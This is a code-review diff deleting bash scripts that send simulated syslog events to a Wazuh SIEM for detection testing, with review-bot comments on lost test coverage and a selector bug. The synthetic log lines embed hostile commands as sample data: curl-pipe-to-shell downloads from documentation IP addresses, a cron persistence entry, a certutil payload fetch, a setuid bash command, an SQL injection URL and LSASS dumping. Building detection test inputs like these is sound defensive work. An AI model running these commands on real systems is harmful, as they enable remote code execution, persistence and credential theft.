-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
64
-}
65
-
66
-random_id() {
67
-  printf "%s" "cisco-evt-$(date +%s)-$RANDOM-$RANDOM"
68
-}
69
-
70
-send_asa_acl_deny() {
71
-  local eid
72
-  eid="$(random_id)"
73
-  emit_syslog "<166>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %ASA-4-106023: Deny tcp src outside:${CISCO_SRC_IP}/51515 dst inside:${CISCO_DST_IP}/445 by access-group \"outside_access_in\" [0x0, 0x0] soc_mvp_test=true vendor=cisco product=asa event_id=${eid} event_type=cisco_asa_acl_deny severity=high"
74
-}
75
-
76
-send_asa_vpn_auth_fail() {
77
-  local eid
78
-  eid="$(random_id)"
79
-  emit_syslog "<166>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %ASA-4-113019: Group = RA-VPN, Username = ${CISCO_VPN_USER}, IP = ${CISCO_SRC_IP}, Session disconnected. Session Type: SSL, Duration: 0h:00m:01s, Bytes xmt: 0, Bytes rcv: 0, Reason: User Requested. soc_mvp_test=true vendor=cisco product=asa event_id=${eid} event_type=cisco_vpn_auth_fail severity=medium"
80
-}
81
-
82
-send_ios_login_fail() {
83
-  local eid
84
-  eid="$(random_id)"
85
-  emit_syslog "<165>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ${CISCO_ADMIN_USER}] [Source: ${CISCO_SRC_IP}] [localport: 22] [Reason: Login Authentication Failed] at 19:30:00 UTC Tue Feb 17 2026 soc_mvp_test=true vendor=cisco product=ios event_id=${eid} event_type=cisco_ios_login_fail severity=medium"
86
-}
87
-
88
-send_ios_config_change() {
89
-  local eid
90
-  eid="$(random_id)"
91
-  emit_syslog "<165>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %SYS-5-CONFIG_I: Configured from console by ${CISCO_ADMIN_USER} on vty0 ( ${CISCO_SRC_IP} ) soc_mvp_test=true vendor=cisco product=ios event_id=${eid} event_type=cisco_config_change severity=low"
92
-}
93
-
94
-send_once() {
95
-  case "${SCENARIO}" in
96
-    asa_acl_deny)
97
-      send_asa_acl_deny
98
-      ;;
99
-    asa_vpn_auth_fail)
100
-      send_asa_vpn_auth_fail
101
-      ;;
102
-    ios_login_fail)
103
-      send_ios_login_fail
104
-      ;;
105
-    ios_config_change)
106
-      send_ios_config_change
107
-      ;;
108
-    all)
109
-      send_asa_acl_deny
110
-      send_asa_vpn_auth_fail
111
-      send_ios_login_fail
112
-      send_ios_config_change
113
-      ;;
114
-    *)
115
-      echo "error: unknown scenario '${SCENARIO}'"
116
-      echo "valid: asa_acl_deny | asa_vpn_auth_fail | ios_login_fail | ios_config_change | all"
117
-      exit 1
118
-      ;;
119
-  esac
120
-}
121
-
122
-if [[ "${FOREVER}" == "true" ]]; then
123
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
124
-  trap 'echo; echo "stopped"; exit 0' INT TERM
125
-  while true; do
126
-    send_once
127
-    sleep "${DELAY}"
128
-  done
129
-else
130
-  for ((i=1; i<=COUNT; i++)); do
131
-    send_once
132
-    if [[ "${i}" -lt "${COUNT}" ]]; then
133
-      sleep "${DELAY}"
134
-    fi
135
-  done
136
-fi
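Review bot: Deleting this file removes the only sender for `event_type=cisco_asa_acl_deny`, `cisco_vpn_auth_fail`, `cisco_ios_login_fail` and `cisco_config_change`, and the replacement's documented selectors (`all`, `a*`, `b*`, `c*`) do not include a Cisco case. Please confirm in the commit message whether any rule or decoder still keys on these event types; if so, carry the four messages over as tagged sample lines, otherwise remove the matching rules in the same change so nothing is left without a test input. If the `emit_syslog` transport is meant to live on in the new script, note that here the `nc` path and the `/dev/udp` fallback both report success without any acknowledgement from the manager, which is worth a comment wherever it is kept.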

+ 0 - 228
scripts/send-wazuh-endpoint-agent-test-events.sh

@@ -1,228 +0,0 @@
1
-#!/usr/bin/env bash
2
-set -euo pipefail
3
-
4
-PLATFORM="${1:-all}"      # windows | mac | linux | all
5
-SCENARIO="${2:-all}"      # auth | process | persistence | privilege | malware | all
6
-COUNT="1"
7
-DELAY="0.3"
8
-FOREVER="false"
9
-DRY_RUN="${DRY_RUN:-0}"
10
-COUNT_SET="false"
11
-DELAY_SET="false"
12
-
13
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
14
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
15
-
16
-WIN_HOST="${WIN_HOST:-win-client-01}"
17
-MAC_HOST="${MAC_HOST:-mac-client-01}"
18
-LINUX_HOST="${LINUX_HOST:-linux-client-01}"
19
-SIM_USER="${SIM_USER:-jane.doe}"
20
-
21
-shift 2 || true
22
-
23
-while (($#)); do
24
-  case "$1" in
25
-    --forever)
26
-      FOREVER="true"
27
-      shift
28
-      ;;
29
-    *)
30
-      if [[ "${COUNT_SET}" == "false" ]]; then
31
-        COUNT="$1"
32
-        COUNT_SET="true"
33
-      elif [[ "${DELAY_SET}" == "false" ]]; then
34
-        DELAY="$1"
35
-        DELAY_SET="true"
36
-      else
37
-        echo "error: unexpected argument '$1'"
38
-        echo "usage: scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]"
39
-        exit 1
40
-      fi
41
-      shift
42
-      ;;
43
-  esac
44
-done
45
-
46
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
47
-  echo "error: count must be a positive integer"
48
-  exit 1
49
-fi
50
-
51
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
52
-  echo "error: delay must be numeric (example: 0.5)"
53
-  exit 1
54
-fi
55
-
56
-emit_syslog() {
57
-  local msg="$1"
58
-  local sent="false"
59
-
60
-  if [[ "${DRY_RUN}" == "1" ]]; then
61
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
62
-    return 0
63
-  fi
64
-
65
-  if command -v nc >/dev/null 2>&1; then
66
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
67
-      sent="true"
68
-    fi
69
-  fi
70
-
71
-  if [[ "${sent}" != "true" ]]; then
72
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
73
-      sent="true"
74
-    fi
75
-  fi
76
-
77
-  if [[ "${sent}" != "true" ]]; then
78
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
79
-    return 1
80
-  fi
81
-
82
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
83
-}
84
-
85
-rand_public_ip() {
86
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
87
-    echo "198.51.100.$((RANDOM % 240 + 10))"
88
-  else
89
-    echo "203.0.113.$((RANDOM % 240 + 10))"
90
-  fi
91
-}
92
-
93
-rand_private_ip() {
94
-  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
95
-}
96
-
97
-send_windows_auth() {
98
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_auth_fail severity=medium event_id=4625 account=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
99
-}
100
-
101
-send_windows_process() {
102
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_suspicious_process severity=high event_id=4688 process=\"powershell.exe\" cmdline=\"powershell -enc <base64>\" parent=\"winword.exe\" user=\"${SIM_USER}\""
103
-}
104
-
105
-send_windows_persistence() {
106
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_persistence_registry severity=high event_id=4657 registry_path=\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater\" user=\"${SIM_USER}\""
107
-}
108
-
109
-send_windows_privilege() {
110
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_privilege_group_add severity=high event_id=4732 account=\"${SIM_USER}\" target_group=\"Administrators\""
111
-}
112
-
113
-send_windows_malware() {
114
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_malware_detected severity=high event_id=1116 engine=\"Defender\" threat=\"Trojan:Win32/AgentTesla\" path=\"C:\\\\Users\\\\${SIM_USER}\\\\AppData\\\\Local\\\\Temp\\\\invoice.exe\" action=\"quarantine\""
115
-}
116
-
117
-send_mac_auth() {
118
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_auth_fail severity=medium subsystem=\"com.apple.loginwindow\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
119
-}
120
-
121
-send_mac_process() {
122
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_suspicious_process severity=high process=\"osascript\" cmdline=\"osascript -e do shell script curl ...\" parent=\"Safari\" user=\"${SIM_USER}\""
123
-}
124
-
125
-send_mac_persistence() {
126
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_launchagent_created severity=high plist=\"/Users/${SIM_USER}/Library/LaunchAgents/com.apple.updater.plist\" user=\"${SIM_USER}\""
127
-}
128
-
129
-send_mac_privilege() {
130
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_privilege_escalation severity=high action=\"sudo\" user=\"${SIM_USER}\" tty=\"ttys001\" cmd=\"/bin/chmod +s /bin/bash\""
131
-}
132
-
133
-send_mac_malware() {
134
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_xprotect_detected severity=high signature=\"OSX.Adload\" file=\"/Users/${SIM_USER}/Downloads/installer.pkg\" action=\"blocked\""
135
-}
136
-
137
-send_linux_auth() {
138
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_ssh_auth_fail severity=medium process=\"sshd\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
139
-}
140
-
141
-send_linux_process() {
142
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_suspicious_process severity=high process=\"curl\" cmdline=\"curl http://198.51.100.20/a.sh | bash\" user=\"${SIM_USER}\""
143
-}
144
-
145
-send_linux_persistence() {
146
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_cron_persistence severity=high file=\"/etc/cron.d/system-update\" user=\"root\" command=\"*/5 * * * * curl -fsSL http://203.0.113.20/s | sh\""
147
-}
148
-
149
-send_linux_privilege() {
150
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_sudo_privilege_escalation severity=high user=\"${SIM_USER}\" command=\"sudo usermod -aG sudo ${SIM_USER}\" src_ip=$(rand_private_ip)"
151
-}
152
-
153
-send_linux_malware() {
154
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_malware_detected severity=high scanner=\"clamav\" signature=\"Unix.Trojan.Mirai\" file=\"/tmp/kworkerd\" action=\"removed\""
155
-}
156
-
157
-send_one_platform() {
158
-  local p="$1"
159
-  case "${SCENARIO}" in
160
-    auth)
161
-      "send_${p}_auth"
162
-      ;;
163
-    process)
164
-      "send_${p}_process"
165
-      ;;
166
-    persistence)
167
-      "send_${p}_persistence"
168
-      ;;
169
-    privilege)
170
-      "send_${p}_privilege"
171
-      ;;
172
-    malware)
173
-      "send_${p}_malware"
174
-      ;;
175
-    all)
176
-      "send_${p}_auth"
177
-      "send_${p}_process"
178
-      "send_${p}_persistence"
179
-      "send_${p}_privilege"
180
-      "send_${p}_malware"
181
-      ;;
182
-    *)
183
-      echo "error: unknown scenario '${SCENARIO}'"
184
-      echo "valid: auth | process | persistence | privilege | malware | all"
185
-      exit 1
186
-      ;;
187
-  esac
188
-}
189
-
190
-send_once() {
191
-  case "${PLATFORM}" in
192
-    windows)
193
-      send_one_platform "windows"
194
-      ;;
195
-    mac|macos)
196
-      send_one_platform "mac"
197
-      ;;
198
-    linux)
199
-      send_one_platform "linux"
200
-      ;;
201
-    all)
202
-      send_one_platform "windows"
203
-      send_one_platform "mac"
204
-      send_one_platform "linux"
205
-      ;;
206
-    *)
207
-      echo "error: unknown platform '${PLATFORM}'"
208
-      echo "valid: windows | mac | linux | all"
209
-      exit 1
210
-      ;;
211
-  esac
212
-}
213
-
214
-if [[ "${FOREVER}" == "true" ]]; then
215
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
216
-  trap 'echo; echo "stopped"; exit 0' INT TERM
217
-  while true; do
218
-    send_once
219
-    sleep "${DELAY}"
220
-  done
221
-else
222
-  for ((i=1; i<=COUNT; i++)); do
223
-    send_once
224
-    if [[ "${i}" -lt "${COUNT}" ]]; then
225
-      sleep "${DELAY}"
226
-    fi
227
-  done
228
-fi
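
Review bot: this deletion removes all fifteen `send_<platform>_<scenario>` generators, and among the script bodies visible in this diff it is the only one emitting `source=mac_agent` and `source=linux_agent` events. Rules keyed on `event_type` values such as `mac_launchagent_created` or `linux_cron_persistence` are left with no test input here. Either point to the replacement generator or keep the message templates as static fixtures so those detections can still be regression-tested. If `emit_syslog` is carried into a replacement, note that its `sent:` line only confirms a local UDP write, not receipt by the collector.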

File diff suppressed because it is too large
+ 0 - 217
scripts/send-wazuh-fortigate-continuous.sh


File diff suppressed because it is too large
+ 0 - 135
scripts/send-wazuh-fortigate-test-events.sh


+ 0 - 230
scripts/send-wazuh-proposal-appendix-b-events.sh

@@ -1,230 +0,0 @@
1
-#!/usr/bin/env bash
2
-set -euo pipefail
3
-
4
-# Usage:
5
-#   scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
6
-#
7
-# selector:
8
-#   all | b1 | b2 | b3 | <usecase_id>
9
-#   example usecase_id: B1-01, B2-01, B3-06
10
-
11
-SELECTOR="${1:-all}"
12
-COUNT="${2:-1}"
13
-DELAY="${3:-0.3}"
14
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
15
-DRY_RUN="${DRY_RUN:-0}"
16
-FOREVER="false"
17
-PROFILE="${PROFILE:-simulation}"
18
-
19
-for arg in "${@:4}"; do
20
-  case "${arg}" in
21
-    --forever)
22
-      FOREVER="true"
23
-      ;;
24
-    --profile=*)
25
-      PROFILE="${arg#*=}"
26
-      ;;
27
-    *)
28
-      echo "error: unexpected argument '${arg}'"
29
-      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
30
-      exit 1
31
-      ;;
32
-  esac
33
-done
34
-
35
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
36
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
37
-
38
-VCENTER_HOST="${VCENTER_HOST:-vcenter-01}"
39
-ESXI_HOST="${ESXI_HOST:-esxi-01}"
40
-LOGMON_HOST="${LOGMON_HOST:-logmon-01}"
41
-WIN_SYSMON_HOST="${WIN_SYSMON_HOST:-win-sysmon-01}"
42
-SIM_USER="${SIM_USER:-jane.doe}"
43
-
44
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
45
-  echo "error: count must be a positive integer"
46
-  exit 1
47
-fi
48
-
49
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
50
-  echo "error: delay must be numeric"
51
-  exit 1
52
-fi
53
-
54
-if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
55
-  echo "error: EVENT_DELAY must be numeric"
56
-  exit 1
57
-fi
58
-
59
-if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
60
-  echo "error: profile must be simulation or production"
61
-  exit 1
62
-fi
63
-
64
-rand_public_ip() {
65
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
66
-    echo "198.51.100.$((RANDOM % 240 + 10))"
67
-  else
68
-    echo "203.0.113.$((RANDOM % 240 + 10))"
69
-  fi
70
-}
71
-
72
-emit_syslog() {
73
-  local msg="$1"
74
-  local sent="false"
75
-
76
-  if [[ "${DRY_RUN}" == "1" ]]; then
77
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
78
-    return 0
79
-  fi
80
-
81
-  if command -v nc >/dev/null 2>&1; then
82
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
83
-      sent="true"
84
-    fi
85
-  fi
86
-
87
-  if [[ "${sent}" != "true" ]]; then
88
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
89
-      sent="true"
90
-    fi
91
-  fi
92
-
93
-  if [[ "${sent}" != "true" ]]; then
94
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
95
-    return 1
96
-  fi
97
-
98
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
99
-}
100
-
101
-selector_matches() {
102
-  local id="$1"
103
-  local section="$2"
104
-  local sel
105
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
106
-  local idl
107
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
108
-  local sec
109
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
110
-
111
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
112
-}
113
-
114
-emit_b_usecase() {
115
-  local id="$1"
116
-  local section="$2"
117
-  local severity="$3"
118
-  local source="$4"
119
-  local host="$5"
120
-  local usecase="$6"
121
-  local body="$7"
122
-
123
-  selector_matches "${id}" "${section}" || return 0
124
-
125
-  local tags
126
-  if [[ "${PROFILE}" == "production" ]]; then
127
-    tags="soc_mvp_test=true source=${source} severity=${severity}"
128
-  else
129
-    tags="soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
130
-  fi
131
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} ${tags} ${body}"
132
-  sleep "${EVENT_DELAY}"
133
-}
134
-
135
-emit_b1() {
136
-  local sip
137
-  sip="$(rand_public_ip)"
138
-
139
-  emit_b_usecase "B1-01" "B1" "high" "vmware" "${VCENTER_HOST}" \
140
-    "vCenter GUI Login Failed 5 Times and Success 1 Time" \
141
-    "event_type=vmware_vcenter_login_fail_success login_fail_count=5 login_success_count=1 user=\"${SIM_USER}\" src_ip=${sip}"
142
-
143
-  emit_b_usecase "B1-02" "B1" "medium" "vmware" "${ESXI_HOST}" \
144
-    "ESXi Enable SSH on Hosts" \
145
-    "event_type=vmware_esxi_enable_ssh action=enable service=ssh user=\"root\" host=\"${ESXI_HOST}\""
146
-
147
-  emit_b_usecase "B1-03" "B1" "high" "vmware" "${ESXI_HOST}" \
148
-    "ESXi SSH Failed 5 Times and Success 1 Time" \
149
-    "event_type=vmware_esxi_ssh_fail_success ssh_fail_count=5 ssh_success_count=1 user=\"root\" src_ip=${sip}"
150
-}
151
-
152
-emit_b2() {
153
-  emit_b_usecase "B2-01" "B2" "low" "log_monitor" "${LOGMON_HOST}" \
154
-    "Log Monitor Logs Loss Detection" \
155
-    "event_type=log_loss_detection missing_stream=firewall expected_eps=500 observed_eps=0 duration_seconds=180"
156
-}
157
-
158
-emit_b3() {
159
-  emit_b_usecase "B3-01" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
160
-    "Sysmon LSASS Dumping" \
161
-    "event_type=sysmon_lsass_dump event_id=10 process=procdump.exe target_process=lsass.exe user=\"${SIM_USER}\""
162
-
163
-  emit_b_usecase "B3-02" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
164
-    "Sysmon SQL Injection" \
165
-    "event_type=sysmon_sql_injection event_id=1 process=w3wp.exe url=\"/app/login.php?id=1%27%20OR%201=1--\""
166
-
167
-  emit_b_usecase "B3-03" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
168
-    "Sysmon Webshell" \
169
-    "event_type=sysmon_webshell event_id=11 file=\"C:\\\\inetpub\\\\wwwroot\\\\shell.aspx\" process=w3wp.exe"
170
-
171
-  emit_b_usecase "B3-04" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
172
-    "Sysmon Uninstall" \
173
-    "event_type=sysmon_security_agent_uninstall event_id=1 process=msiexec.exe cmdline=\"msiexec /x security-agent\" user=\"${SIM_USER}\""
174
-
175
-  emit_b_usecase "B3-05" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
176
-    "Sysmon LSASS Dumping by Task Manager" \
177
-    "event_type=sysmon_lsass_dump_taskmgr event_id=10 process=taskmgr.exe target_process=lsass.exe action=create_dump"
178
-
179
-  emit_b_usecase "B3-06" "B3" "medium" "windows_sysmon" "${WIN_SYSMON_HOST}" \
180
-    "Sysmon CertUtil Download" \
181
-    "event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\""
182
-}
183
-
184
-emit_selected_set() {
185
-  local sel
186
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
187
-
188
-  case "${sel}" in
189
-    all)
190
-      emit_b1
191
-      emit_b2
192
-      emit_b3
193
-      ;;
194
-    b1|b1-*)
195
-      emit_b1
196
-      ;;
197
-    b2|b2-*)
198
-      emit_b2
199
-      ;;
200
-    b3|b3-*)
201
-      emit_b3
202
-      ;;
203
-    *)
204
-      emit_b1
205
-      emit_b2
206
-      emit_b3
207
-      ;;
208
-  esac
209
-}
210
-
211
-echo "starting proposal Appendix B log simulator"
212
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
213
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
214
-
215
-if [[ "${FOREVER}" == "true" ]]; then
216
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
217
-  trap 'echo; echo "stopped"; exit 0' INT TERM
218
-  while true; do
219
-    emit_selected_set
220
-    sleep "${DELAY}"
221
-  done
222
-else
223
-  for ((i=1; i<=COUNT; i++)); do
224
-    emit_selected_set
225
-    if [[ "${i}" -lt "${COUNT}" ]]; then
226
-      sleep "${DELAY}"
227
-    fi
228
-  done
229
-  echo "done"
230
-fi
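
Review bot: logic problem worth not carrying into whatever replaces this script. In `emit_selected_set` the `*)` arm runs `emit_b1`, `emit_b2` and `emit_b3` for any unrecognised selector, but `selector_matches` then rejects every use case, so a typo such as `b4` sends nothing, prints `done` and exits 0. For a detection test harness that reads as a pass with zero events. An unknown selector should fail with a non-zero exit, the way the argument loop already does for unexpected flags. The header `# Usage:` comment also omits `--forever` and `--profile=`, which the error-path usage string lists.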

+ 0 - 235
scripts/send-wazuh-proposal-appendix-c-events.sh

@@ -1,235 +0,0 @@
1
-#!/usr/bin/env bash
2
-set -euo pipefail
3
-
4
-# Usage:
5
-#   scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds] [--forever]
6
-#
7
-# selector:
8
-#   all | c1 | c2 | c3 | <usecase_id>
9
-#   example usecase_id: C1-01, C2-03, C3-04
10
-
11
-SELECTOR="${1:-all}"
12
-COUNT="${2:-1}"
13
-DELAY="${3:-0.3}"
14
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
15
-DRY_RUN="${DRY_RUN:-0}"
16
-FOREVER="false"
17
-
18
-for arg in "${@:4}"; do
19
-  case "${arg}" in
20
-    --forever)
21
-      FOREVER="true"
22
-      ;;
23
-    *)
24
-      echo "error: unexpected argument '${arg}'"
25
-      echo "usage: scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds] [--forever]"
26
-      exit 1
27
-      ;;
28
-  esac
29
-done
30
-
31
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
32
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
33
-VPN_HOST="${VPN_HOST:-fgt-vpn-01}"
34
-WIN_HOST="${WIN_HOST:-win-ad-01}"
35
-SIM_USER="${SIM_USER:-alice.admin}"
36
-SIM_SERVICE_USER="${SIM_SERVICE_USER:-svc_backup}"
37
-SIM_SRC_IP="${SIM_SRC_IP:-203.0.113.44}"
38
-
39
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
40
-  echo "error: count must be a positive integer"
41
-  exit 1
42
-fi
43
-
44
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
45
-  echo "error: delay must be numeric"
46
-  exit 1
47
-fi
48
-
49
-emit_syslog() {
50
-  local msg="$1"
51
-  local sent="false"
52
-
53
-  if [[ "${DRY_RUN}" == "1" ]]; then
54
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
55
-    return 0
56
-  fi
57
-
58
-  if command -v nc >/dev/null 2>&1; then
59
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
60
-      sent="true"
61
-    fi
62
-  fi
63
-
64
-  if [[ "${sent}" != "true" ]]; then
65
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
66
-      sent="true"
67
-    fi
68
-  fi
69
-
70
-  if [[ "${sent}" != "true" ]]; then
71
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
72
-    return 1
73
-  fi
74
-
75
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
76
-}
77
-
78
-selector_matches() {
79
-  local id="$1"
80
-  local section="$2"
81
-  local sel
82
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
83
-  local idl
84
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
85
-  local sec
86
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
87
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
88
-}
89
-
90
-emit_c_usecase() {
91
-  local id="$1"
92
-  local section="$2"
93
-  local severity="$3"
94
-  local host="$4"
95
-  local usecase="$5"
96
-  local body="$6"
97
-
98
-  selector_matches "${id}" "${section}" || return 0
99
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
100
-  sleep "${EVENT_DELAY}"
101
-}
102
-
103
-emit_c1() {
104
-  # Two successful logins by same user with impossible travel profile
105
-  emit_c_usecase "C1-01" "C1" "high" "${VPN_HOST}" \
106
-    "Impossible Travel Detection" \
107
-    "event_type=vpn_login_success event_id=4624 success=true user=\"${SIM_USER}\" src_ip=203.150.10.10 country=TH src_lat=13.7563 src_lon=100.5018 dst_host=vpn-gw-01"
108
-
109
-  emit_c_usecase "C1-01" "C1" "high" "${VPN_HOST}" \
110
-    "Impossible Travel Detection" \
111
-    "event_type=vpn_login_success event_id=4624 success=true user=\"${SIM_USER}\" src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01"
112
-}
113
-
114
-emit_c2() {
115
-  emit_c_usecase "C2-01" "C2" "high" "${WIN_HOST}" \
116
-    "Privileged Account Usage Outside Business Hours" \
117
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=${SIM_SRC_IP} logon_type=10 dst_host=dc-01"
118
-
119
-  emit_c_usecase "C2-02" "C2" "medium" "${WIN_HOST}" \
120
-    "Dormant Account Activation" \
121
-    "event_type=windows_auth_success event_id=4624 success=true user=\"legacy.user\" src_ip=198.51.100.55 dst_host=dc-01"
122
-
123
-  emit_c_usecase "C2-03" "C2" "high" "${WIN_HOST}" \
124
-    "Service Account Interactive Logon" \
125
-    "event_type=windows_auth_success event_id=4624 success=true user=\"${SIM_SERVICE_USER}\" account_type=service is_service=true logon_type=10 src_ip=198.51.100.66 dst_host=filesrv-01"
126
-
127
-  emit_c_usecase "C2-04" "C2" "high" "${WIN_HOST}" \
128
-    "Rapid Privilege Escalation then Sensitive Access" \
129
